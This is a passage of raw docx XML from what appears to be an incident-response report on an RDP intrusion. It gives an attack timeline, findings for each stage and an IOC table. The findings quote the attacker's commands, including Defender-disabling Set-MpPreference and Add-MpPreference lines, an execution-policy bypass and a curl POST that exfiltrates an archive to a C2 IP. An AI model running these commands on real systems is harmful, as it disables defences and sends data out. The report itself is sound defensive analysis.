              <w:t>C2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A71B" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>msupdate.exe initiates outbound connection to 185.92.220.87</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C1E8E" w14:paraId="5769AC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94D8F" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>2025-09-16 19:40 PM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480F" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Discovery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2A82" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>whoami.exe executed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C1E8E" w14:paraId="04C54A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B338" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>2025-09-16 19:40 PM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1467" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Discovery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A1F1" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">cmd.exe /c </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>systeminfo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whoami</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> /all, net user, ipconfig /all, netstat -</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>ano</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C1E8E" w14:paraId="446B55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5985" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>2025-09-16 19:41 PM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05DA" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Collection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616D" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">backup_sync.zip created in </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>AppData</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>\Local</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C1E8E" w14:paraId="0125C8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7E31" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>2025-09-16 19:43 PM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FA7D" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Exfiltration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5B56" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>curl -X POST to 185.92.220.87:8081 exfiltrating archive</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C1E8E" w14:paraId="0DFD39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1983" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>2025-09-27 02:59 AM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46F9D" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Defense Evasion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A1C7" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Defender exclusion added: C:\Windows\Temp</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C1E8E" w14:paraId="1F8EB5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431E" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>2025-09-27 02:59 AM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A612" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Defense Evasion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E804" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Set-</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>MpPreference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proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>DisableRealtimeMonitoring</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> $true</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C1E8E" w14:paraId="5C73ED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E823" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>2025-09-27 03:34 AM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4C66" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Persistence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BC0C" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Additional scheduled tasks: </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>EdgeUpdateTask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MicrosoftEdgeUpdateCore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WindowsDefenderUpdate</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6675C7D4" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="002C1E8E">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="2E75B6"/>
        </w:pBdr>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F7FF65E" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>5. Detailed Findings by Stage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B1B52A1" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Stage 1: Initial Access (T1110.001)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="623DEC90" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The attacker conducted a brute force password spray against the RDP service on </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>slflarewinsysmo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>. Multiple failed logon events (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>EventID</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 4625, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>LogonType</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 10) were observed from 159.26.106.84 between 18:35-18:38 UTC before a successful logon at 18:43 UTC using the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>slflare</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> account.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CA936BC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Attacker IP: 159.26.106.84</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02A5D61E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 xml:space="preserve">Compromised Account: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>slflare</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2F13EE21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Attack Vector: RDP (Port 3389)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AA3286E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Pattern: Failed attempts → Successful logon (classic password spray)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5052D688" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Stage 2: Execution (T1059.003 / T1204.002)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14FCFFB1" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>After gaining RDP access, the attacker dropped a malicious binary msupdate.exe to C:\Users\Public\ — a world-writable directory used to evade user-specific permissions. The binary was executed with PowerShell execution policy bypass, invoking update_check.ps1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48E9EC70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Binary: msupdate.exe (C:\Users\Public\msupdate.exe)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="512054EF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Command: "msupdate.exe" -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ExecutionPolicy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Bypass -File C:\Users\Public\update_check.ps1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60674344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Additional scripts dropped: update.ps1, update_check.ps1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="748C7DDD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Masquerades as a legitimate Windows update utility</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CC57248" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Stage 3: Persistence (T1053.005)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DBE1CAE" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The attacker created a scheduled task named </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>MicrosoftUpdateSync</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> with a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>BootTrigger</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, ensuring the payload executes on every system boot. Additional tasks were later created to maintain multiple persistence mechanisms.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="115F27F7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 xml:space="preserve">Primary Task: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>MicrosoftUpdateSync</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>BootTrigger</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A8CDFAA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 xml:space="preserve">Secondary Tasks: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>EdgeUpdateTask</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>MicrosoftEdgeUpdateCore</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>WindowsDefenderUpdate</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, OneDrive Standalone Update Task</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="596D2152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All tasks masquerade as legitimate Microsoft services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AA43934" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Stage 4: Defense Evasion (T1562.001)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="193367BE" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>The attacker modified Windows Defender configuration to prevent detection of malicious files and activity. Real-time monitoring was disabled and folder exclusions were added via PowerShell cmdlets.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="641FB46B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Excluded Path: C:\Windows\Temp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F596941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Command: Set-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>MpPreference</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>DisableRealtimeMonitoring</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> $true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1427AA2C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Command: Set-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>MpPreference</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>DisableIOAVProtection</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> $true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50B81F5E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Command: Add-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>MpPreference</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ExclusionPath</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> C:\</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42983AA1" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Stage 5: Discovery (T1082)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="650E1864" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>The attacker performed systematic host enumeration using built-in Windows utilities to map the environment, identify users, network configuration, and running processes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68CA8F5D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 xml:space="preserve">cmd.exe /c </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>systeminfo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3DEAD739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whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> /all</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="754F89E2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net user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07699DB0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 xml:space="preserve">net </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>localgroup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> administrators</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79D322B4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ipconfig /all</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33E75551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netstat -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ano</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4CC0DCEA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tasklist</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> /svc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DE7EAB5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query user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6523D23B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 xml:space="preserve">wmic </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>computersystem</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> get domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A450F48" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Stage 6: Collection (T1560.001)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3667FB93" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The attacker archived target data into a ZIP file prior to exfiltration. The archive was created in the user's </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>AppData</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Local directory to avoid detection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E2AF5A4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Archive: backup_sync.zip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="611E7A1B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Path: C:\Users\SLFlare\AppData\Local\</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="693F3C5E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Created by: powershell.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39FBC4D4" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Stage 7: Command &amp; Control (T1071.001)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ABADB53" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The attacker established outbound C2 communication to an external server using HTTP-based protocols. Both the malicious binary and PowerShell </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>scripts initiated</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> connections to the same C2 infrastructure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D7CBE9E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C2 IP: 185.92.220.87</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75A98777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Initiating Processes: msupdate.exe, powershell.exe, curl.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03BED8CB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Protocol: HTTP/S over non-standard port</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B8FA143" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Stage 8: Exfiltration (T1048.003)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="602A660C" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Data was exfiltrated using curl.exe over an unencrypted channel using HTTP POST to the C2 server on port 8081. The exfiltration command directly referenced the staged archive file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5599CAFA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Destination: 185.92.220.87:8081</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="080CB2E3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Method: curl -X POST -F "file=@C:\Users\..." (archive file upload)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A376EAD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Protocol: HTTP (unencrypted)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B9DD63C" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="002C1E8E">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="2E75B6"/>
        </w:pBdr>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2130B183" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>6. Indicators of Compromise (IOCs)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6"/>
        <w:gridCol w:w="3719"/>
        <w:gridCol w:w="3645"/>
      </w:tblGrid>
      <w:tr w:rsidR="002C1E8E" w14:paraId="381853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AFDA" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>IOC Type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200D" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66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751B" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Context</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C1E8E" w14:paraId="409301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417A" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>IP Address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9188" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>159.26.106.84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C854" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Attacker RDP source IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C1E8E" w14:paraId="6FB8E5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33EA" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>IP Address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8675" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>185.92.220.87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DFF0" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>C2 server / exfiltration destination</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C1E8E" w14:paraId="3C0F4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249A" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Port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EA67" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>8081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760A" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Exfiltration port on C2 server</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C1E8E" w14:paraId="7D17A4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8D57" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>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078B" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>msupdate.exe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172C" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Malicious binary (C:\Users\Public\)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C1E8E" w14:paraId="41716E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7142" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>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ADE4" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>update_check.ps1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F785" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>PowerShell payload (C:\Users\Public\)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C1E8E" w14:paraId="32D9EB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8B6A" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>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3DE6" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>update.ps1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529C" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>PowerShell payload (C:\Users\Public\)</w:t>
            </w:r>
          </w:p>
